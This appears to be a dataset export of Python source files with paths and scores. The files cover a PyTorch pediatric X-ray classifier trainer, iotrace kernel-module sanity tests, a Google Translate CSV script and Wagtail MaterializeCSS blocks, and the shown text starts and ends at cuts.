get_ci (bool, optional): whether to calculate the confidence interval. Defaults to False.
n_boostrap (int, optional): number of Bootstrap samples. Defaults to 10000.
Returns:
dict: dictionary of evaluated metrics.
"""
preds_stack, labels_stack, running_loss = self.predict_loader(
loader, cal_loss=True)
running_metrics = get_metrics(
preds_stack, labels_stack, self.metrics, self.thresh_val)
running_metrics['loss'] = running_loss
if get_ci:
ci_dict = self.eval_CI(labels_stack, preds_stack, n_boostrap)
return running_metrics, ci_dict
return running_metrics
def thresholding(self, loader):
"""Run thresholding using Youden's J statistic.
Args:
loader (torch.utils.data.Dataloader): dataloader use for thresholding.
"""
auc_opt = AUC()
preds, labels, _ = self.predict_loader(loader)
thresh_val = auc_opt(preds, labels, thresholding=True)
print(f"List optimal threshold {thresh_val}")
self.thresh_val = torch.Tensor(thresh_val).float().cuda()
def eval_CI(self, labels, preds, n_boostrap=1000, csv_path=None):
"""
Calculate confidence interval using Bootstrap Sampling.
"""
return boostrap_ci(labels, preds, self.metrics, n_boostrap, self.thresh_val, csv_path)
def stacking(self, train_loader, val_loader, epochs=10, eval_metric='auc'):
"""
Run stacking ensemble.
"""
if not isinstance(self.model, Ensemble):
raise Exception("model must be Ensemble!!!")
optimizer = get_optimizer(self.stacking_model.parameters(), self.cfg)
def lambda1(epoch): return 0.9 ** epoch
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lambda1)
os.makedirs(os.path.join(
'experiment', self.cfg.log_dir), exist_ok=True)
ckp_dir = os.path.join('experiment', self.cfg.log_dir, 'checkpoint')
os.makedirs(ckp_dir, exist_ok=True)
self.model.freeze()
self.stacking_model.unfreeze()
self.stacking_model.cuda()
running_loss = AverageMeter()
best_metric = 0.0
for epoch in range(epochs):
self.stacking_model.train()
for i, data in enumerate(tqdm.tqdm(train_loader)):
imgs, labels = data[0].to(self.device), data[1].to(self.device)
preds = self.stacking_model(self.model(imgs))
loss = self.metrics['loss'](preds, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss.update(loss.item(), imgs.shape[0])
s = "Epoch [{}/{}]:\n".format(
epoch+1, epochs)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
self.stacking_model.eval()
running_metrics = self.test(val_loader)
running_metrics.pop('loss')
s = get_str(running_metrics, 'val', s)
metric_eval = running_metrics[eval_metric]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
torch.save(self.stacking_model.state_dict(),
os.path.join(ckp_dir, 'latest.ckpt'))
running_loss.reset()
scheduler.step()
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!') | model/classifier.py | import torch.nn as nn
import numpy as np
import time
import cv2
import os
import shutil
import tqdm
import torch
import wandb
from utils.metrics import AUC
from data.utils import transform
from model.models import Stacking, save_dense_backbone, load_dense_backbone, save_resnet_backbone, load_resnet_backbone, Ensemble, AverageMeter
from model.utils import get_models, get_str, tensor2numpy, get_optimizer, load_ckp, lrfn, get_metrics, get_device
from utils.confidence_interval import boostrap_ci
class Pediatric_Classifier():
def __init__(self, cfg, loss_func, metrics=None):
"""Pediatric_Classifier class used to train and evaluate model performance
Args:
cfg: contain configuration.
loss_func: Loss function.
metrics (dict, optional): dictionary contains evaluation metrics. Defaults to None.
"""
self.cfg = cfg
if self.cfg.type == 'pediatric':
self.cfg.num_classes = 13*[1]
elif self.cfg.type == 'chexmic':
self.cfg.num_classes = 14*[1]
else:
self.cfg.num_classes = [1]
self.device = get_device(self.cfg.device)
self.model = get_models(self.cfg)
if self.cfg.ensemble == 'stacking':
self.stacking_model = Stacking(len(self.model))
if os.path.isfile(self.cfg.ckp_stack):
self.stacking_model.load_state_dict(torch.load(
self.cfg.ckp_stack, map_location=torch.device("cpu")))
self.stacking_model.to(self.device)
self.stacking_model.freeze()
self.loss_func = loss_func
if metrics is not None:
self.metrics = metrics
self.metrics['loss'] = self.loss_func
else:
self.metrics = {'loss': self.loss_func}
if cfg.parallel:
self.model = torch.nn.DataParallel(self.model)
self.model.to(self.device)
self.thresh_val = torch.Tensor(
[0.5]*len(self.cfg.num_classes)).float().to(self.device)
def save_backbone(self, ckp_path):
"""
Save model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
save_dense_backbone(model_part, ckp_path)
elif self.cfg.backbone == 'resnet':
save_resnet_backbone(model_part, ckp_path)
def load_backbone(self, ckp_path, strict=True):
"""
Load model backbone to ckp_path.
"""
if self.cfg.parallel:
model_part = self.model.module
else:
model_part = self.model
if self.cfg.backbone == 'dense' or self.cfg.backbone == 'densenet':
load_dense_backbone(model_part, ckp_path, self.device, strict)
elif self.cfg.backbone == 'resnet':
load_resnet_backbone(model_part, ckp_path, self.device, strict)
def load_ckp(self, ckp_path, strict=True):
"""
Load model from ckp_path.
"""
return load_ckp(self.model, ckp_path, self.device, self.cfg.parallel, strict)
def save_ckp(self, ckp_path, epoch, iter):
"""
Save model to ckp_path.
"""
if os.path.exists(os.path.dirname(ckp_path)):
torch.save(
{'epoch': epoch+1,
'iter': iter+1,
'state_dict': self.model.module.state_dict() if self.cfg.parallel else self.model.state_dict()},
ckp_path
)
else:
print("Save path not exist!!!")
def predict(self, image):
"""Run prediction
Args:
image (torch.Tensor): images to predict. Shape (batch size, C, H, W)
Returns:
torch.Tensor: model prediction
"""
self.model.eval()
with torch.no_grad() as tng:
preds = self.model(image)
if not isinstance(self.model, Ensemble) and self.cfg.ensemble == 'none':
preds = nn.Sigmoid()(preds)
elif self.cfg.ensemble == 'average':
preds = preds.mean(-1)
elif self.cfg.ensemble == 'stacking':
preds = self.stacking_model(preds)
return preds
def predict_from_file(self, image_file):
"""Run prediction from image path
Args:
image_file (str): image path
Returns:
numpy array: model prediction in numpy array type
"""
image_gray = cv2.imread(image_file, 0)
image = transform(image_gray, self.cfg)
image = torch.from_numpy(image)
image = image.unsqueeze(0)
return tensor2numpy(nn.Sigmoid()(self.predict(image)))
def predict_loader(self, loader, cal_loss=False):
"""Run prediction on a given dataloader.
Args:
loader (torch.utils.data.Dataloader): a dataloader
cal_loss (bool): whether to calculate the loss. Defaults to True
Returns:
torch.Tensor, torch.Tensor, torch.Tensor: prediction, labels, loss value
"""
preds_stack = []
labels_stack = []
running_loss = AverageMeter()
ova_len = loader.dataset.n_data
loop = tqdm.tqdm(enumerate(loader), total=len(loader))
for i, data in loop:
imgs, labels = data[0].to(self.device), data[1].to(self.device)
if self.cfg.tta:
# imgs = torch.cat(imgs, dim=0)
list_imgs = [imgs[:, j] for j in range(imgs.shape[1])]
imgs = torch.cat(list_imgs, dim=0)
preds = self.predict(imgs)
batch_len = labels.shape[0]
list_preds = [preds[batch_len*j:batch_len *
(j+1)] for j in range(len(list_imgs))]
preds = torch.stack(list_preds, dim=0).mean(dim=0)
else:
preds = self.predict(imgs)
preds_stack.append(preds)
labels_stack.append(labels)
if cal_loss:
# running_loss.append(self.metrics['loss'](
# preds, labels).item()*iter_len/ova_len)
running_loss.update(self.metrics['loss'](
preds, labels).item(), imgs.shape[0])
preds_stack = torch.cat(preds_stack, 0)
labels_stack = torch.cat(labels_stack, 0)
return preds_stack, labels_stack, running_loss.avg
def train(self, train_loader, val_loader, epochs=10, iter_log=100, use_lr_sch=False, resume=False, ckp_dir='./experiment/checkpoint',
eval_metric='auc'):
"""Run training
Args:
train_loader (torch.utils.data.Dataloader): dataloader use for training
val_loader (torch.utils.data.Dataloader): dataloader use for validation
epochs (int, optional): number of training epochs. Defaults to 120.
iter_log (int, optional): logging iteration. Defaults to 100.
use_lr_sch (bool, optional): use learning rate scheduler. Defaults to False.
resume (bool, optional): resume training process. Defaults to False.
ckp_dir (str, optional): path to checkpoint directory. Defaults to './experiment/checkpoint'.
eval_metric (str, optional): name of metric for validation. Defaults to 'loss'.
"""
wandb.init(name=self.cfg.log_dir,
project='Pediatric Multi-label Classifier')
optimizer = get_optimizer(self.model.parameters(), self.cfg)
if use_lr_sch:
lr_sch = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lrfn)
lr_hist = []
else:
lr_sch = None
best_metric = 0.0
if os.path.exists(ckp_dir) != True:
os.mkdir(ckp_dir)
if resume:
epoch_resume, iter_resume = self.load_ckp(
os.path.join(ckp_dir, 'latest.ckpt'))
else:
epoch_resume = 1
iter_resume = 0
scaler = None
if self.cfg.mix_precision:
print('Train with mix precision!')
scaler = torch.cuda.amp.GradScaler()
for epoch in range(epoch_resume-1, epochs):
start = time.time()
running_loss = AverageMeter()
n_iter = len(train_loader)
torch.set_grad_enabled(True)
self.model.train()
batch_weights = (1/iter_log)*np.ones(n_iter)
step_per_epoch = n_iter // iter_log
if n_iter % iter_log:
step_per_epoch += 1
batch_weights[-(n_iter % iter_log):] = 1 / (n_iter % iter_log)
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
iter_per_step[-1] = n_iter % iter_log
else:
iter_per_step = iter_log * \
np.ones(step_per_epoch, dtype=np.int16)
i = 0
for step in range(step_per_epoch):
loop = tqdm.tqdm(
range(iter_per_step[step]), total=iter_per_step[step])
iter_loader = iter(train_loader)
for iteration in loop:
data = next(iter_loader)
imgs, labels = data[0].to(
self.device), data[1].to(self.device)
if self.cfg.mix_precision:
with torch.cuda.amp.autocast():
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
else:
preds = self.model(imgs)
loss = self.metrics['loss'](preds, labels)
preds = nn.Sigmoid()(preds)
running_loss.update(loss.item(), imgs.shape[0])
optimizer.zero_grad()
if self.cfg.mix_precision:
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
optimizer.step()
i += 1
if wandb:
wandb.log(
{'loss/train': running_loss.avg}, step=(epoch*n_iter)+(i+1))
s = "Epoch [{}/{}] Iter [{}/{}]:\n".format(
epoch+1, epochs, i+1, n_iter)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
running_metrics_test = self.test(
val_loader, False)
torch.set_grad_enabled(True)
self.model.train()
s = get_str(running_metrics_test, 'val', s)
if wandb:
for key in running_metrics_test.keys():
if key != 'loss':
for j, disease_class in enumerate(np.array(train_loader.dataset.disease_classes)):
wandb.log(
{key+'/'+disease_class: running_metrics_test[key][j]}, step=(epoch*n_iter)+(i+1))
else:
wandb.log(
{'loss/val': running_metrics_test['loss']}, step=(epoch*n_iter)+(i+1))
if self.cfg.type != 'chexmic':
metric_eval = running_metrics_test[eval_metric]
else:
metric_eval = running_metrics_test[eval_metric][self.id_obs]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
self.save_ckp(os.path.join(
ckp_dir, 'latest.ckpt'), epoch, i)
running_loss.reset()
end = time.time()
s += " ({:.1f}s)".format(end-start)
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!')
start = time.time()
if lr_sch is not None:
lr_sch.step()
print('current lr: {:.4f}'.format(lr_sch.get_lr()[0]))
if lr_sch is not None:
return lr_hist
else:
return None
def test(self, loader, get_ci=False, n_boostrap=10000):
"""Run testing
Args:
loader (torch.utils.data.Dataloader): dataloader use for testing.
get_ci (bool, optional): whether to calculate the confidence interval. Defaults to False.
n_boostrap (int, optional): number of Bootstrap samples. Defaults to 10000.
Returns:
dict: dictionary of evaluated metrics.
"""
preds_stack, labels_stack, running_loss = self.predict_loader(
loader, cal_loss=True)
running_metrics = get_metrics(
preds_stack, labels_stack, self.metrics, self.thresh_val)
running_metrics['loss'] = running_loss
if get_ci:
ci_dict = self.eval_CI(labels_stack, preds_stack, n_boostrap)
return running_metrics, ci_dict
return running_metrics
def thresholding(self, loader):
"""Run thresholding using Youden's J statistic.
Args:
loader (torch.utils.data.Dataloader): dataloader use for thresholding.
"""
auc_opt = AUC()
preds, labels, _ = self.predict_loader(loader)
thresh_val = auc_opt(preds, labels, thresholding=True)
print(f"List optimal threshold {thresh_val}")
self.thresh_val = torch.Tensor(thresh_val).float().cuda()
def eval_CI(self, labels, preds, n_boostrap=1000, csv_path=None):
"""
Calculate confidence interval using Bootstrap Sampling.
"""
return boostrap_ci(labels, preds, self.metrics, n_boostrap, self.thresh_val, csv_path)
def stacking(self, train_loader, val_loader, epochs=10, eval_metric='auc'):
"""
Run stacking ensemble.
"""
if not isinstance(self.model, Ensemble):
raise Exception("model must be Ensemble!!!")
optimizer = get_optimizer(self.stacking_model.parameters(), self.cfg)
def lambda1(epoch): return 0.9 ** epoch
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=lambda1)
os.makedirs(os.path.join(
'experiment', self.cfg.log_dir), exist_ok=True)
ckp_dir = os.path.join('experiment', self.cfg.log_dir, 'checkpoint')
os.makedirs(ckp_dir, exist_ok=True)
self.model.freeze()
self.stacking_model.unfreeze()
self.stacking_model.cuda()
running_loss = AverageMeter()
best_metric = 0.0
for epoch in range(epochs):
self.stacking_model.train()
for i, data in enumerate(tqdm.tqdm(train_loader)):
imgs, labels = data[0].to(self.device), data[1].to(self.device)
preds = self.stacking_model(self.model(imgs))
loss = self.metrics['loss'](preds, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss.update(loss.item(), imgs.shape[0])
s = "Epoch [{}/{}]:\n".format(
epoch+1, epochs)
s += "{}_{} {:.3f}\n".format('train', 'loss', running_loss.avg)
self.stacking_model.eval()
running_metrics = self.test(val_loader)
running_metrics.pop('loss')
s = get_str(running_metrics, 'val', s)
metric_eval = running_metrics[eval_metric]
s = s[:-1] + "- mean_"+eval_metric + \
" {:.3f}".format(metric_eval.mean())
torch.save(self.stacking_model.state_dict(),
os.path.join(ckp_dir, 'latest.ckpt'))
running_loss.reset()
scheduler.step()
print(s)
if metric_eval.mean() > best_metric:
best_metric = metric_eval.mean()
shutil.copyfile(os.path.join(ckp_dir, 'latest.ckpt'), os.path.join(
ckp_dir, 'best.ckpt'))
print('new checkpoint saved!') | 0.84367 | 0.24659 |
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
TestRun.LOGGER.info("Testing cli help")
output = TestRun.executor.run('iotrace -H')
if output.exit_code != 0:
raise Exception("Failed to run executable")
def test_version():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing cli version")
output = TestRun.executor.run('iotrace -V')
parsed = TestRun.plugins['iotrace'].parse_json(output.stdout)
bin_version = parsed[0]['trace']
TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
output = TestRun.executor.run("cat /sys/module/iotrace/version")
if output.exit_code != 0:
raise Exception("Could not find module version")
module_version = output.stdout
TestRun.LOGGER.info("Module version is: " + module_version)
if bin_version != module_version:
raise Exception("Mismatching executable and module versions")
def test_module_loaded():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing iotrace kernel module loading")
output = TestRun.executor.run('lsmod | grep iotrace')
if output.exit_code != 0:
raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
TestRun.LOGGER.info("Testing starting and stopping of tracing")
iotrace: IotracePlugin = TestRun.plugins['iotrace']
iotrace.start_tracing()
stopped = iotrace.stop_tracing()
if not stopped:
raise Exception("Could not stop active tracing.")
trace_path = iotrace.get_latest_trace_path()
summary = iotrace.get_trace_summary(trace_path)
summary_parsed = iotrace.parse_json(summary)
if summary_parsed[0]['state'] != "COMPLETE":
raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest. | tests/security/test_sanity.py |
import pytest
from core.test_run import TestRun
from iotrace import IotracePlugin
from utils.installer import insert_module
def test_help():
TestRun.LOGGER.info("Testing cli help")
output = TestRun.executor.run('iotrace -H')
if output.exit_code != 0:
raise Exception("Failed to run executable")
def test_version():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing cli version")
output = TestRun.executor.run('iotrace -V')
parsed = TestRun.plugins['iotrace'].parse_json(output.stdout)
bin_version = parsed[0]['trace']
TestRun.LOGGER.info("iotrace binary version is: " + str(parsed[0]['trace']))
TestRun.LOGGER.info("OCTF library version is: " + str(parsed[1]['trace']))
output = TestRun.executor.run("cat /sys/module/iotrace/version")
if output.exit_code != 0:
raise Exception("Could not find module version")
module_version = output.stdout
TestRun.LOGGER.info("Module version is: " + module_version)
if bin_version != module_version:
raise Exception("Mismatching executable and module versions")
def test_module_loaded():
# Make sure module is loaded
insert_module()
TestRun.LOGGER.info("Testing iotrace kernel module loading")
output = TestRun.executor.run('lsmod | grep iotrace')
if output.exit_code != 0:
raise Exception("Failed to find loaded iotrace kernel module")
def test_trace_start_stop():
TestRun.LOGGER.info("Testing starting and stopping of tracing")
iotrace: IotracePlugin = TestRun.plugins['iotrace']
iotrace.start_tracing()
stopped = iotrace.stop_tracing()
if not stopped:
raise Exception("Could not stop active tracing.")
trace_path = iotrace.get_latest_trace_path()
summary = iotrace.get_trace_summary(trace_path)
summary_parsed = iotrace.parse_json(summary)
if summary_parsed[0]['state'] != "COMPLETE":
raise Exception("Trace state is not complete")
# TODO (trybicki) test for sanity checking installation, e.g. validating install_manifest. | 0.229104 | 0.356923 |
import pandas as pd
from google.cloud import translate
import os
import numpy as np
import csv
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'/Users/hbae/PycharmProjects/keraconocr/venv/credentials2.json'
def test():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv')
#print(df['Image_Content_txt'][0])
count = df.shape[0]
file=open("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv", 'w', newline='', encoding='utf-8-sig')
wr = csv.writer(file)
header = ["ID", "번역"]
wr.writerow(header)
for i in range(count):
text = df['Spell_Checked_Content'][i]
print(text)
translated = str(translate_text(text))
list = [i, translated]
print(translated)
wr.writerow(list)
file.close()
# 번역
def translate_text(text):
# Instantiates a client
translate_client = translate.Client()
# The text to translate
#text = u'Hello, world!'
# The target language
target = 'en'
# Translates some text into Russian
translation = translate_client.translate(
text,
target_language=target)
translated_text = translation['translatedText']
return translated_text
#print(u'Target Lang: {}'.format(target))
#print(u'Text: {}'.format(text))
#print(u'Translation: {}'.format(translation['translatedText']))
#번역한거랑 전체데이터 합쳐주는 함수
def merge():
b = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv")
a = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_Cleansing_v2 복사본.csv")
a.rename(columns={'Unnamed: 0':'ID'}, inplace = True)
b.rename(columns={'번': 'ID'}, inplace=True)
print(a.columns.values[0])
merged = a.merge(b, on='ID')
print(merged)
merged.to_csv("/Users/hbae/PycharmProjects/keraconocr/venv/output.csv", index=False)
#nan 포함된 행 없애주는 함수
def delete():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_v2_spell_checked.csv')
df = df.dropna(axis=0)
df.to_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv', index=False)
if __name__ == '__main__':
test() | collect/csvTotxt.py | import pandas as pd
from google.cloud import translate
import os
import numpy as np
import csv
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'/Users/hbae/PycharmProjects/keraconocr/venv/credentials2.json'
def test():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv')
#print(df['Image_Content_txt'][0])
count = df.shape[0]
file=open("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv", 'w', newline='', encoding='utf-8-sig')
wr = csv.writer(file)
header = ["ID", "번역"]
wr.writerow(header)
for i in range(count):
text = df['Spell_Checked_Content'][i]
print(text)
translated = str(translate_text(text))
list = [i, translated]
print(translated)
wr.writerow(list)
file.close()
# 번역
def translate_text(text):
# Instantiates a client
translate_client = translate.Client()
# The text to translate
#text = u'Hello, world!'
# The target language
target = 'en'
# Translates some text into Russian
translation = translate_client.translate(
text,
target_language=target)
translated_text = translation['translatedText']
return translated_text
#print(u'Target Lang: {}'.format(target))
#print(u'Text: {}'.format(text))
#print(u'Translation: {}'.format(translation['translatedText']))
#번역한거랑 전체데이터 합쳐주는 함수
def merge():
b = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/translated.csv")
a = pd.read_csv("/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_Cleansing_v2 복사본.csv")
a.rename(columns={'Unnamed: 0':'ID'}, inplace = True)
b.rename(columns={'번': 'ID'}, inplace=True)
print(a.columns.values[0])
merged = a.merge(b, on='ID')
print(merged)
merged.to_csv("/Users/hbae/PycharmProjects/keraconocr/venv/output.csv", index=False)
#nan 포함된 행 없애주는 함수
def delete():
df = pd.read_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_v2_spell_checked.csv')
df = df.dropna(axis=0)
df.to_csv('/Users/hbae/PycharmProjects/keraconocr/venv/Final_Data_v2_Cleansing_spell_checked_deleted.csv', index=False)
if __name__ == '__main__':
test() | 0.079859 | 0.064742 |
from django.utils.translation import ugettext_lazy as _
from wagtail.core import blocks
from wagtail.images.blocks import ImageChooserBlock
__all__ = ['LinkBlock', 'Badge', 'Button', 'FAB', 'Breadcrumb', 'Card', 'Collection', 'Icon', 'Preloader']
class LinkStructValue(blocks.StructValue):
def url(self):
external_url = self.get('external_url')
page = self.get('page')
if external_url:
return external_url
elif page:
return page.url
class LinkBlock(blocks.StructBlock):
"""Link block ('a' tag) with the options to link to a page or external url. This block also has an icon option."""
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
text = blocks.CharBlock(label="link text", required=True)
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'site'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/link_block.html'
label = _('Link')
class Badge(blocks.StructBlock):
"""Badge ('span' tag) that notifies user that an item is unread."""
number = blocks.IntegerBlock()
is_new = blocks.BooleanBlock()
class Meta:
label = _('Badge')
template = 'wagtail_materializecss/components/badge.html'
class Button(LinkBlock):
"""Button ('a' tag) is a link block that can have a set color."""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
icon = 'link'
value_class = LinkStructValue
label = _('Button')
template = 'wagtail_materializecss/components/button.html'
class FAB(blocks.StructBlock):
"""Floating action button. This block only has an icon, color, and link. This block has no text!"""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'plus-inverse'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/fab.html'
label = _('Floating Action Button')
class Breadcrumb(blocks.ListBlock):
"""Breadcrumb that show the page hierarchy. This breadcrumb should be a list of links that point back to the
root page.
"""
def __init__(self, child_block=None, **kwargs):
if child_block is None:
child_block = LinkBlock()
super().__init__(child_block, **kwargs)
class Meta:
label = _('Breadcrumb')
template = 'wagtail_materializecss/components/breadcrumb.html'
class Card(blocks.StructBlock):
"""Card to display content in many different ways."""
title = blocks.CharBlock(default='', blank=True)
content = blocks.RichTextBlock(default='', blank=True)
actions = blocks.ListBlock(LinkBlock(label=_('Card Action')), default=[], blank=True, reqiured=False)
CARD_SIZES = [
('', 'Not Set'),
('small', 'Small'),
('medium', 'Medium'),
('large', 'Large'),
]
size = blocks.ChoiceBlock(choices=CARD_SIZES, default=CARD_SIZES[0][0], required=False)
horizontal = blocks.BooleanBlock(default=False, required=False, blank=True)
image = ImageChooserBlock(required=False)
background_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
text_color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
label = _('Card')
template = 'wagtail_materializecss/components/card.html'
class CollectionItem(blocks.StructBlock):
"""CollectionItem ('li' tag) is a list item that belongs in a stylized collection."""
title = blocks.CharBlock()
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Item')
icon = 'list-ul'
template = 'wagtail_materializecss/components/collection_item.html'
class CollectionLink(CollectionItem):
"""CollectionLink ('li' tag) is a link inside of list item that belongs in a stylized collection."""
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
label = _('Collection Link')
icon = 'link'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/collection_link.html'
class CollectionHeader(CollectionItem):
"""CollectionHeader ('li' tag) is a large header for a stylized collection."""
class Meta:
label = _('Collection Header')
icon = 'title'
template = 'wagtail_materializecss/components/collection_header.html'
class CollectionAvatar(blocks.StructBlock):
"""CollectionAvatar ('li' tag) is a bigger collection item that includes an image or icon."""
image = ImageChooserBlock(required=False, blank=True, help_text="Main image (icon is an alternative option)")
icon = blocks.CharBlock(required=False, blank=True, help_text="Main image as an icon instead of an image.")
title = blocks.CharBlock()
content = blocks.RichTextBlock(default='', required=False, blank=True)
secondary_icon = blocks.CharBlock(default='', required=False, blank=True)
class Meta:
label = _('Collection Avatar')
icon = 'user'
template = 'wagtail_materializecss/components/collection_avatar.html'
class Collection(blocks.StreamBlock):
"""Collection ('ul' tag) is a stylized list containing different collection items."""
header = CollectionHeader(required=False, blank=True)
link = CollectionLink(required=False, blank=True)
item = CollectionItem(required=False, blank=True)
avatar = CollectionAvatar(required=False, blank=True)
class Meta:
label = _('Collection')
icon = 'list-ul'
# value_class = HasHeaderValue
template = 'wagtail_materializecss/components/collection.html'
def get_context(self, value, parent_context=None):
context = super().get_context(value, parent_context=parent_context)
value.has_header = any((block.block_type == 'header' for block in context['value']))
return context
class Icon(blocks.CharBlock):
"""Simple icon tag for Material Icons."""
class Meta:
label = _('Icon')
template = 'wagtail_materializecss/components/icon.html'
class PageColorStructValue(blocks.StructValue):
def color_value(self):
color = self.get('color')
page = self.get('page')
if color:
return color
elif page:
try:
return page.color
except AttributeError:
pass
class Preloader(blocks.StructBlock):
"""Preloader ('div' tag) progress bar."""
determinate = blocks.BooleanBlock(default=False, required=False, blank=True)
circular = blocks.BooleanBlock(default=True, required=False, blank=True)
color = blocks.CharBlock(required=False, blank=True, help_text='Preloader color (leave blank to use page color.)')
class Meta:
label = _('Preloader')
icon = 'spinner'
value_class = PageColorStructValue
template = 'wagtail_materializecss/components/preloader.html' | wagtail_materializecss/components.py | from django.utils.translation import ugettext_lazy as _
from wagtail.core import blocks
from wagtail.images.blocks import ImageChooserBlock
__all__ = ['LinkBlock', 'Badge', 'Button', 'FAB', 'Breadcrumb', 'Card', 'Collection', 'Icon', 'Preloader']
class LinkStructValue(blocks.StructValue):
def url(self):
external_url = self.get('external_url')
page = self.get('page')
if external_url:
return external_url
elif page:
return page.url
class LinkBlock(blocks.StructBlock):
"""Link block ('a' tag) with the options to link to a page or external url. This block also has an icon option."""
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
text = blocks.CharBlock(label="link text", required=True)
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'site'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/link_block.html'
label = _('Link')
class Badge(blocks.StructBlock):
"""Badge ('span' tag) that notifies user that an item is unread."""
number = blocks.IntegerBlock()
is_new = blocks.BooleanBlock()
class Meta:
label = _('Badge')
template = 'wagtail_materializecss/components/badge.html'
class Button(LinkBlock):
"""Button ('a' tag) is a link block that can have a set color."""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
class Meta:
icon = 'link'
value_class = LinkStructValue
label = _('Button')
template = 'wagtail_materializecss/components/button.html'
class FAB(blocks.StructBlock):
"""Floating action button. This block only has an icon, color, and link. This block has no text!"""
color = blocks.CharBlock(max_length=25, default='', blank=True, required=False)
icon = blocks.CharBlock(max_length=50, required=False,
help_text='Material-Icons icon name')
page = blocks.PageChooserBlock(label="page", required=False,
help_text="Link to an existing page.")
external_url = blocks.URLBlock(label="external URL", required=False,
help_text="Alternative external link if a page is not set.")
class Meta:
icon = 'plus-inverse'
value_class = LinkStructValue
template = 'wagtail_materializecss/components/fab.html'
label = _('Floating Action Button')
class Breadcrumb(blocks.ListBlock):
"""Breadcrumb that show the page hierarchy. This breadcrumb should be a list of links that point back to the
root page.
"""
def __init__(self, child_block=None, **kwargs):
if child_block is None:
child_block = LinkBlock()
super().__init__(child_block, **kwargs)
class Meta:
label = _('Breadcrumb')
template = 'wagtail_materializecss/components/breadcrumb.html'
class Card(blocks.StructBlock):
"""Card to display content in many different ways."""
title = blocks.CharBlock(default='', blank=True)
content = blocks.RichTextBlock(default='', blank=True)
actions = blocks.ListBlock(LinkBlock(label=_('Card Action')), default=[], blank=True, reqiured=False)
CARD_SIZES = [
('', 'Not Set'),
('small', 'Small'),
('medium', 'Medium'),
('large', 'Large'),
]
size = blocks.ChoiceBlock(choices=CARD_SIZES, default=CARD_SIZES[0][0], required=False)
horizontal = blocks.BooleanBlock(default=False, required=False, blank=True)
image = ImageChooserBlock(required=False)
